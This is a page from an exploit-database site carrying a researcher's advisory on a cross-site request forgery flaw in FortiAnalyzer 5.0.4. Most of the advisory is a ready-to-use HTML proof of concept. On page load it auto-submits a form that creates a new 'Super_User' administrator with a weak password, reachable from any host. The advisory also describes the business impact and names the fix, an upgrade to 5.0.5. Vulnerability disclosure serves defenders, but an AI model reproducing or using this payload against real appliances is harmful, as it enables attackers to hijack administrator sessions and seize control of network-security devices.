0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FortiAnalyzer 5.0.4 - CSRF Vulnerability
[Cert(R) no respond my email, not Fortinet has not given the credits. I. VULNERABILITY ------------------------- CSRF vulnerabilities in OS of fortianalyzer 5.0.4 II. BACKGROUND ------------------------- Fortinet’s industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION ------------------------- Has been detected a CSRF vulnerability in FortiAnalyzer in /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" 5.0.4 , that allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer, because this functions are not protected by CSRF-Tokens. IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter “csrf_token” /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog. <html> <body onload="CSRF.submit();"> <html> <body onload="CSRF.submit();"> <form id="csrf" action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" method="post" name="CSRF"> <input name="userId" value="user.via.cfsr"> </input> <input name="type" value="0"> </input> <input name="rserver" value=""> </input> <input name="lserver" value=""> </input> <input name="subject" value=""> </input> <input name="cacerts" value="Fortinet_CA2"> </input> <input name="password" value="123456"> </input> <input name="password_updated" value="1"> </input> <input name="confirm_pwd" value="123456"> </input> <input name="confirm_pwd_updated" value="1"> </input> <input name="host_1" value="0.0.0.0/0.0.0.0"> </input> <input name="host_2" value="255.255.255.255/255.255.255.255"> </input> <input name="host_3" value="255.255.255.255/255.255.255.255"> </input> <input name="host_4" value="255.255.255.255/255.255.255.255"> </input> <input name="host_5" value="255.255.255.255/255.255.255.255"> </input> <input name="host_6" value="255.255.255.255/255.255.255.255"> </input> <input name="host_7" value="255.255.255.255/255.255.255.255"> </input> <input name="host_8" value="255.255.255.255/255.255.255.255"> </input> <input name="host_9" value="255.255.255.255/255.255.255.255"> </input> <input name="host_10" value="255.255.255.255/255.255.255.255"> </input> <input name="host6_1" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_2" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_3" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_4" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_5" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_6" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_7" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_8" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_9" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_10" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="profile" value="Super_User"> </input> <input name="alladomRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_pack" value=""> </input> <input name="desc" value=""> </input> <input name="showForce" value="0"> </input> <input name="numhosts" value="0"> </input> <input name="numhosts6" value="3"> </input> <input name="_comp_8" value="OK"> </input> <input name="actionevent" value="new"> </input> <input name="profileId" value=""> </input> <input name="mgt" value=""> </input> <input name="dashboard" value=""> </input> <input name="dashboardmodal" value=""> </input> <input name="csrf_token" value=""> </input> </form> </body> </html> V. BUSINESS IMPACT ------------------------- That allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer and have access all function of box. VI. REQUIREMENTS ----------------------- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED ------------------------- Try Fortianalyzer VM or appliance v5.0.4 VIII. SOLUTION ------------------------- UpGrade for v5.0.5 POC https://vimeo.com/78776768 By William Costa william.costa@gmail.com # 0day.today [2024-11-15] #